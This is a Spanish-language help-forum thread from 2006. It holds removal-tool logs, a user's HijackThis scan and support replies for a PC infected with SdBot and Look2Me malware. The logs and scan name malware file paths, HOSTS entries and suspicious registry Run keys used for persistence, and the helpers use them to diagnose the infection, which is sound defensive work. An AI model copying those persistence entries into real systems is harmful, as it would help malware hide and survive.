Lista de Acciones (por Acción Directa):

(Valor "MICROSOFT SERVICE PACK UPDATE")

Por favor, envienos una muestra del fichero

C:\WINDOWS\SYSTEM32\msspupd.exe

a "virus@satinfo.es". Gracias.

C:\WINDOWS\SYSTEM32\SYSHOST.EXE --> Eliminado

Por favor, envienos una muestra del fichero

C:\DOCUME~1\YOLANDA\CONFIG~1\TEMP\SERVICES.EXE.Muestra EliTriIP v1.86

a "virus@satinfo.es". Gracias.

C:\WINDOWS\SERVICES.EXE --> Renombrado a .VIR

Linea Eliminada del HOSTS --> 127.0.0.1 sds-qckads.com

Linea Eliminada del HOSTS --> 127.0.0.1 status.qckads.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.qoolaid.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.qoologic.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.CLKPrecision.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.urllogic.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.clkoptimizer.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.isearch.com

Linea Eliminada del HOSTS --> 127.0.0.1 isearch.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.idownload.com

Linea Eliminada del HOSTS --> 127.0.0.1 idownload.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.mytotalsearch.com

Linea Eliminada del HOSTS --> 127.0.0.1 mytotalsearch.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.lop.com

Linea Eliminada del HOSTS --> 127.0.0.1 lop.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.websearch.com

Linea Eliminada del HOSTS --> 127.0.0.1 websearch.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.page-not-found.net

Linea Eliminada del HOSTS --> 127.0.0.1 page-not-found.net

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.isearchhere.com

Linea Eliminada del HOSTS --> 127.0.0.1 isearchhere.com

Linea Eliminada del HOSTS --> 127.0.0.1 as.adwave.com

Linea Eliminada del HOSTS --> 127.0.0.1 sr.adwave.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.adwave.com

Linea Eliminada del HOSTS --> 127.0.0.1 adwave.com EVENT:HOST:127.0.0.1

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.pacimedia.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.exactsearch.net

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.contextplus.net

Tue Feb 07 18:24:22 2006

EliTriIP v1.86 (c)2006 S.G.H. / Satinfo S.L.

---------------------------------------------

Lista de Acciones (por Acción Directa):

(Valor "MICROSOFT SERVICE PACK UPDATE")

Por favor, envienos una muestra del fichero

C:\WINDOWS\SYSTEM32\msspupd.exe

a "virus@satinfo.es". Gracias.

Linea Eliminada del HOSTS --> 127.0.0.1 sds-qckads.com

Linea Eliminada del HOSTS --> 127.0.0.1 status.qckads.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.qoolaid.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.qoologic.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.CLKPrecision.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.urllogic.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.clkoptimizer.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.isearch.com

Linea Eliminada del HOSTS --> 127.0.0.1 isearch.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.idownload.com

Linea Eliminada del HOSTS --> 127.0.0.1 idownload.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.mytotalsearch.com

Linea Eliminada del HOSTS --> 127.0.0.1 mytotalsearch.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.lop.com

Linea Eliminada del HOSTS --> 127.0.0.1 lop.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.websearch.com

Linea Eliminada del HOSTS --> 127.0.0.1 websearch.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.page-not-found.net

Linea Eliminada del HOSTS --> 127.0.0.1 page-not-found.net

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.isearchhere.com

Linea Eliminada del HOSTS --> 127.0.0.1 isearchhere.com

Linea Eliminada del HOSTS --> 127.0.0.1 as.adwave.com

Linea Eliminada del HOSTS --> 127.0.0.1 sr.adwave.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.adwave.com

Linea Eliminada del HOSTS --> 127.0.0.1 adwave.com EVENT:HOST:127.0.0.1

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.pacimedia.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.exactsearch.net

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.contextplus.net

Tue Feb 07 19:04:09 2006

EliStartPage v11.11 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Acción Directa):

Key Eliminada [WinLogon\Notify\CONTROL PANEL] -> C:\WINDOWS\SYSTEM32\LVLM0931E.DLL

C:\WINDOWS\SYSTEM32\GUARD.TMP --> Eliminado Look2Me

C:\WINDOWS\SYSTEM32\LVLM0931E.DLL --> Eliminado Look2Me

Linea Eliminada del HOSTS --> 127.0.0.1 sds-qckads.com

Linea Eliminada del HOSTS --> 127.0.0.1 status.qckads.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.qoolaid.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.qoologic.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.CLKPrecision.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.urllogic.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.clkoptimizer.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.isearch.com

Linea Eliminada del HOSTS --> 127.0.0.1 isearch.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.idownload.com

Linea Eliminada del HOSTS --> 127.0.0.1 idownload.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.mytotalsearch.com

Linea Eliminada del HOSTS --> 127.0.0.1 mytotalsearch.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.lop.com

Linea Eliminada del HOSTS --> 127.0.0.1 lop.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.websearch.com

Linea Eliminada del HOSTS --> 127.0.0.1 websearch.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.page-not-found.net

Linea Eliminada del HOSTS --> 127.0.0.1 page-not-found.net

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.isearchhere.com

Linea Eliminada del HOSTS --> 127.0.0.1 isearchhere.com

Linea Eliminada del HOSTS --> 127.0.0.1 as.adwave.com

Linea Eliminada del HOSTS --> 127.0.0.1 sr.adwave.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.adwave.com

Linea Eliminada del HOSTS --> 127.0.0.1 adwave.com EVENT:HOST:127.0.0.1

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.pacimedia.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.exactsearch.net

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.contextplus.net

Eliminadas las Paginas de Inicio y de Busqueda del IE

Eliminados Ficheros Temporales del IE

Tue Feb 07 19:07:29 2006

EliStartPage v11.11 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Exploración):

C:\WINDOWS\system32\m0pola731d.dll --> Eliminado, Look2Me

C:\WINDOWS\system32\__delete_on_reboot__kadgr1.dll --> Eliminado, Look2Me

Tue Feb 07 19:33:01 2006

EliTriIP v1.86 (c)2006 S.G.H. / Satinfo S.L.

---------------------------------------------

Lista de Acciones (por Acción Directa):

(Valor "MICROSOFT SERVICE PACK UPDATE")

Por favor, envienos una muestra del fichero

C:\WINDOWS\SYSTEM32\msspupd.exe

a "virus@satinfo.es". Gracias.

Tue Feb 07 19:34:46 2006

EliStartPage v11.11 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Acción Directa):

Eliminadas las Paginas de Inicio y de Busqueda del IE

Eliminados Ficheros Temporales del IE

Wed Feb 08 10:28:42 2006

EliTriIP v1.86 (c)2006 S.G.H. / Satinfo S.L.

---------------------------------------------

Lista de Acciones (por Acción Directa):

(Valor "MICROSOFT SERVICE PACK UPDATE")

Por favor, envienos una muestra del fichero

C:\WINDOWS\SYSTEM32\msspupd.exe

a "virus@satinfo.es". Gracias.

Wed Feb 08 10:31:00 2006

EliStartPage v11.11 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Acción Directa):

Eliminadas las Paginas de Inicio y de Busqueda del IE

Eliminados Ficheros Temporales del IE

Thu Feb 09 11:54:59 2006

EliTriIP v1.87 (c)2006 S.G.H. / Satinfo S.L.

---------------------------------------------

Lista de Acciones (por Acción Directa):

C:\WINDOWS\SYSTEM32\MSSPUPD.EXE --> Eliminado

Entrada Eliminada [HKCU\...\Run] "MICROSOFT SERVICE PACK UPDATE"="msspupd.exe"

Entrada Eliminada [HKLM\...\Run] "MICROSOFT SERVICE PACK UPDATE"="msspupd.exe"

Entrada Eliminada [HKLM\...\RunServices] "MICROSOFT SERVICE PACK UPDATE"="msspupd.exe"

Thu Feb 09 11:55:33 2006

EliTriIP v1.87 (c)2006 S.G.H. / Satinfo S.L.

---------------------------------------------

Lista de Acciones (por Exploración):

C:\Documents and Settings\yolanda\Escritorio\msspupd.exe --> Eliminado, SdBot.worm.gen.G

Thu Feb 09 11:56:57 2006

EliStartPage v11.12 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Acción Directa):

Eliminadas las Paginas de Inicio y de Busqueda del IE

Eliminados Ficheros Temporales del IE

Thu Feb 09 12:08:46 2006

EliStartPage v11.12 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Acción Directa):

Eliminadas las Paginas de Inicio y de Busqueda del IE

Eliminados Ficheros Temporales del IE

Thu Feb 09 12:16:07 2006

EliStartPage v11.12 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Acción Directa):

Eliminadas las Paginas de Inicio y de Busqueda del IE

Eliminados Ficheros Temporales del IE

Thu Feb 09 12:54:26 2006

EliStartPage v11.12 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Acción Directa):

Eliminadas las Paginas de Inicio y de Busqueda del IE

Eliminados Ficheros Temporales del IE

Thu Feb 09 15:01:53 2006

EliStartPage v11.12 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Acción Directa):

Eliminadas las Paginas de Inicio y de Busqueda del IE

Eliminados Ficheros Temporales del IE

Thu Feb 09 18:27:10 2006

EliStartPage v11.12 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Acción Directa):

Eliminadas las Paginas de Inicio y de Busqueda del IE

Eliminados Ficheros Temporales del IE

Thu Feb 09 18:36:29 2006

EliStartPage v11.13 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Acción Directa):

Eliminadas las Paginas de Inicio y de Busqueda del IE

Eliminados Ficheros Temporales del IE

Thu Feb 09 18:36:36 2006

EliStartPage v11.13 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Exploración):

C:\Documents and Settings\yolanda\Escritorio\winsysupd5.exe --> Eliminado, DCToolBar

Fri Feb 10 11:40:40 2006

EliStartPage v11.13 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Acción Directa):

Eliminadas las Paginas de Inicio y de Busqueda del IE

Eliminados Ficheros Temporales del IE

Sun Feb 12 12:12:16 2006

EliStartPage v11.14 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Acción Directa):

Eliminadas las Paginas de Inicio y de Busqueda del IE

Eliminados Ficheros Temporales del IE

Sun Feb 12 12:12:46 2006

EliStartPage v11.14 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Acción Directa):

Eliminadas las Paginas de Inicio y de Busqueda del IE

Eliminados Ficheros Temporales del IE

Mon Feb 13 16:22:13 2006

EliStartPage v11.14 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Acción Directa):

Eliminadas las Paginas de Inicio y de Busqueda del IE

Mon Feb 13 16:52:51 2006

EliStartPage v11.14 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Acción Directa):

Eliminadas las Paginas de Inicio y de Busqueda del IE

Mon Feb 13 16:53:20 2006

EliStartPage v11.14 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Acción Directa):

Eliminadas las Paginas de Inicio y de Busqueda del IE

Tue Feb 14 10:21:20 2006

EliStartPage v11.14 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Acción Directa):

C:\WINDOWS\WEB\RELATED.HTM --> Eliminado

Eliminadas las Paginas de Inicio y de Busqueda del IE

Tue Feb 14 10:37:02 2006

EliStartPage v11.15 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Acción Directa):

Eliminadas las Paginas de Inicio y de Busqueda del IE

Tue Feb 14 10:44:26 2006

EliStartPage v11.15 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Acción Directa):

Eliminadas las Paginas de Inicio y de Busqueda del IE

Tue Feb 14 10:49:50 2006

EliTriIP v1.88 (c)2006 S.G.H. / Satinfo S.L.

---------------------------------------------

Lista de Acciones (por Exploración):

C:\WINDOWS\system32\TFTP2324 --> Eliminado, SdBot.worm.gen.H

Tue Feb 14 10:50:44 2006

EliStartPage v11.15 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Acción Directa):

Eliminadas las Paginas de Inicio y de Busqueda del IE

Tue Feb 14 10:51:06 2006

EliStartPage v11.15 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Acción Directa):

Eliminadas las Paginas de Inicio y de Busqueda del IE

Wed Feb 15 17:20:31 2006

EliStartPage v11.15 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Exploración):

C:\Documents and Settings\yolanda\Configuración local\Archivos temporales de Internet\Content.IE5\AWLPQRYT\ads[13].htm --> Eliminado, StartPage-DU (Pag.Ini)

Wed Feb 15 17:23:52 2006

EliTriIP v1.88 (c)2006 S.G.H. / Satinfo S.L.

---------------------------------------------

Lista de Acciones (por Acción Directa):

C:\WINDOWS\SYSTEM32\I --> Eliminado

Wed Feb 15 17:24:20 2006

EliTriIP v1.88 (c)2006 S.G.H. / Satinfo S.L.

---------------------------------------------

Lista de Acciones (por Exploración):

C:\WINDOWS\system32\rwnt.exe --> Eliminado, SdBot.worm.gen.H

Wed Feb 15 18:16:37 2006

EliTriIP v1.88 (c)2006 S.G.H. / Satinfo S.L.

---------------------------------------------

Lista de Acciones (por Acción Directa):

C:\WINDOWS\SYSTEM32\I --> Eliminado

Wed Feb 15 18:18:34 2006

EliStartPage v11.15 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Acción Directa):

Eliminadas las Paginas de Inicio y de Busqueda del IE

mindtram · Mensaje por **mindtram** » 15 Feb 2006, 18:48

Y vuelta con el mensajito de que se va a apagar el sistema.¿que hago?!!!!!!!!!

Mensaje por **msc hotline sat** » 15 Feb 2006, 19:03

Has de instalar un cortafuegos !!!

Será otro SDBOT, ya sabes el camino. verdad ?

saludos

ms, 15-2-2006

mindtram · Mensaje por **mindtram** » 15 Feb 2006, 19:08

no se el camino.¿que cortafuegos me aconsejas?

Mensaje por **msc hotline sat** » 15 Feb 2006, 19:27

Empieza por posteart un HJT actual...

y cortafuegos solo usamos de hardware, pero de software hay muchos y gratuitos para uso domestico como el Zore Alarm. Los desactivan los virus pero...

Y cuando puedas invertir unos 120 euros, si tienes ADSL a traves de router, unm alphashield.html

http://satinfo.es/welcome-alphashield.html

y olvidate del problema

saludos

ms,. 15-2-200

mindtram · Mensaje por **mindtram** » 15 Feb 2006, 19:29

aki ta el hjt

Logfile of HijackThis v1.99.1

Scan saved at 19:28:20, on 15/02/2006

Platform: Windows XP SP1 (WinNT 5.01.2600)

MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:

C:\WINDOWS\System32\smss.exe

C:\WINDOWS\system32\winlogon.exe

C:\WINDOWS\system32\services.exe

C:\WINDOWS\system32\svchost.exe

C:\WINDOWS\System32\svchost.exe

C:\WINDOWS\system32\spoolsv.exe

C:\ARCHIV~1\Grisoft\AVGFRE~1\avgamsvr.exe

C:\ARCHIV~1\Grisoft\AVGFRE~1\avgupsvc.exe

C:\ARCHIV~1\Grisoft\AVGFRE~1\avgemc.exe

C:\Archivos de programa\ewido anti-malware\ewidoctrl.exe

C:\Archivos de programa\ewido anti-malware\ewidoguard.exe

C:\Archivos de programa\Ahead\InCD\InCDsrv.exe

C:\WINDOWS\AppPatch\Patches32\svchost.exe

C:\WINDOWS\AppPatch\Patches32\csrss.exe

C:\WINDOWS\System32\hphmon05.exe

C:\WINDOWS\System32\spool\drivers\w32x86\3\hpztsb09.exe

C:\Archivos de programa\Hewlett-Packard\HP Software Update\HPWuSchd.exe

C:\Archivos de programa\HP\hpcoretech\hpcmpmgr.exe

C:\Archivos de programa\Ahead\InCD\InCD.exe

C:\Archivos de programa\Messenger\msmsgs.exe

C:\Archivos de programa\Telefonica\KitAIM\AimMon.exe

C:\Archivos de programa\Telefonica\Kit ADSL USB\dslmon.exe

C:\WINDOWS\System32\HPZipm12.exe

C:\Archivos de programa\Internet Explorer\IEXPLORE.EXE

C:\Archivos de programa\Internet Explorer\IEXPLORE.EXE

C:\Archivos de programa\Internet Explorer\IEXPLORE.EXE

C:\WINDOWS\system32\cmd.exe

C:\WINDOWS\system32\cmd.exe

C:\WINDOWS\system32\cmd.exe

C:\WINDOWS\system32\cmd.exe

C:\WINDOWS\system32\cmd.exe

C:\Archivos de programa\Internet Explorer\IEXPLORE.EXE

C:\WINDOWS\explorer.exe

C:\Documents and Settings\yolanda\Mis documentos\HijackThis.exe

R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =

R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =

R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =

O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Archivos de programa\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll

O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\archivos de programa\google\googletoolbar2.dll

O4 - HKLM\..\Run: [NeroCheck] C:\WINDOWS\system32\NeroCheck.exe

O4 - HKLM\..\Run: [HPHUPD05] C:\Archivos de programa\Hewlett-Packard\{45B6180B-DCAB-4093-8EE8-6164457517F0}\hphupd05.exe

O4 - HKLM\..\Run: [HPHmon05] C:\WINDOWS\System32\hphmon05.exe

O4 - HKLM\..\Run: [HPDJ Taskbar Utility] C:\WINDOWS\System32\spool\drivers\w32x86\3\hpztsb09.exe

O4 - HKLM\..\Run: [HP Software Update] "C:\Archivos de programa\Hewlett-Packard\HP Software Update\HPWuSchd.exe"

O4 - HKLM\..\Run: [HP Component Manager] "C:\Archivos de programa\HP\hpcoretech\hpcmpmgr.exe"

O4 - HKLM\..\Run: [AgenteADSL_15] C:\Archivos de programa\Telefonica\KitAIM\AimExDll.exe AimGestA.dll 4

O4 - HKLM\..\Run: [taskbar.exe] C:\dm.exe

O4 - HKLM\..\Run: [Microsoft Secure Module] msmd.exe

O4 - HKLM\..\Run: [AVG7_CC] C:\ARCHIV~1\Grisoft\AVGFRE~1\avgcc.exe /STARTUP

O4 - HKLM\..\Run: [InCD] C:\Archivos de programa\Ahead\InCD\InCD.exe

O4 - HKLM\..\RunServices: [Microsoft Secure Module] msmd.exe

O4 - HKCU\..\Run: [MSMSGS] "C:\Archivos de programa\Messenger\msmsgs.exe" /background

O4 - Global Startup: Consola KIT ADSL.lnk = ?

O4 - Global Startup: Inicio rápido de Adobe Reader.lnk = C:\Archivos de programa\Adobe\Acrobat 7.0\Reader\reader_sl.exe

O8 - Extra context menu item: &Google Search - res://c:\archivos de programa\google\GoogleToolbar2.dll/cmsearch.html

O8 - Extra context menu item: &Translate English Word - res://c:\archivos de programa\google\GoogleToolbar2.dll/cmwordtrans.html

O8 - Extra context menu item: Backward Links - res://c:\archivos de programa\google\GoogleToolbar2.dll/cmbacklinks.html

O8 - Extra context menu item: Cached Snapshot of Page - res://c:\archivos de programa\google\GoogleToolbar2.dll/cmcache.html

O8 - Extra context menu item: Descargar con &BitSpirit - C:\ARCHIV~1\BITSPI~1\bsurl.htm

O8 - Extra context menu item: Similar Pages - res://c:\archivos de programa\google\GoogleToolbar2.dll/cmsimilar.html

O8 - Extra context menu item: Translate Page into English - res://c:\archivos de programa\google\GoogleToolbar2.dll/cmtrans.html

O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - (no file)

O16 - DPF: {0EB0E74A-2A76-4AB3-A7FB-9BD8C29F7F75} (CKAVWebScan Object) - http://www.kaspersky.com/downloads/kws/kavwebscan_unicode.cab

O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft.com/fwlink/?linkid=39204

O16 - DPF: {7B297BFD-85E4-4092-B2AF-16A91B2EA103} (WScanCtl Class) - http://www3.ca.com/securityadvisor/virusinfo/webscan.cab

O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} (Java Runtime Environment 1.4.1_01) -

O16 - DPF: {CAFEEFAC-0014-0001-0001-ABCDEFFEDCBA} (Java Runtime Environment 1.4.1_01) -

O17 - HKLM\System\CCS\Services\Tcpip\..\{46246E6C-9594-49E7-B619-AC46E990B164}: NameServer = 80.58.61.250 80.58.61.254

O23 - Service: Automatic Update Service (Automatic Update) - Unknown owner - C:\WINDOWS\System32\wuapi.exe (file missing)

O23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - GRISOFT, s.r.o. - C:\ARCHIV~1\Grisoft\AVGFRE~1\avgamsvr.exe

O23 - Service: AVG7 Update Service (Avg7UpdSvc) - GRISOFT, s.r.o. - C:\ARCHIV~1\Grisoft\AVGFRE~1\avgupsvc.exe

O23 - Service: AVG E-mail Scanner (AVGEMS) - GRISOFT, s.r.o. - C:\ARCHIV~1\Grisoft\AVGFRE~1\avgemc.exe

O23 - Service: ewido security suite control - ewido networks - C:\Archivos de programa\ewido anti-malware\ewidoctrl.exe

O23 - Service: ewido security suite guard - ewido networks - C:\Archivos de programa\ewido anti-malware\ewidoguard.exe

O23 - Service: InCD File System Service (InCDsrv) - AHEAD Software - C:\Archivos de programa\Ahead\InCD\InCDsrv.exe

O23 - Service: Microsoft Dynamic Network (MDNetwork) - Unknown owner - C:\WINDOWS\system32\MDN.exe (file missing)

O23 - Service: Network Monitor - Unknown owner - C:\Archivos de programa\Network Monitor\netmon.exe (file missing)

O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\System32\HPZipm12.exe

O23 - Service: Microsoft Windows Update Service (Windows Update Service) - Unknown owner - C:\WINDOWS\services.exe (file missing)

Mensaje por **msc hotline sat** » 15 Feb 2006, 19:56

Envianos estos dos ficheros:

C:\WINDOWS\AppPatch\Patches32\svchost.exe

C:\WINDOWS\AppPatch\Patches32\csrss.exe

Ojo de donde los copias, vigila bien la ruta !!!

No me envies kis de lka carpeta de sistyema !!! :lol: :lol: :lol:

Y a qué esperas para ponet los parches ???

LANZA UN WINDOWSUPDATE !!!

dslufod

ms, 15-2-2006

mindtram · Mensaje por **mindtram** » 15 Feb 2006, 20:15

ya los he enviado.De todas formas esa carpeta para que sirve? yo no la instale.

Mensaje por **msc hotline sat** » 16 Feb 2006, 07:17

Para contener estos ficheros con el mismo nombre que el de los del sistema y despistar...

saludos

ms, 16-2-2006

Mensaje por **msc hotline sat** » 16 Feb 2006, 09:59

Recibidos los ficherios pasamos a analizarloss

Ademas sin muy sispoechisas estas claves:

O4 - HKLM\..\RunServices: [Microsoft Secure Module] msmd.exe

O4 - HKLM\..\Run: [Microsoft Secure Module] msmd.exe

pero no aparecen los ficheros en uso ???.

Mira si los tiens y nos los envias, y si no eliminaremos estas claves

saludos

ma, 16-2-2006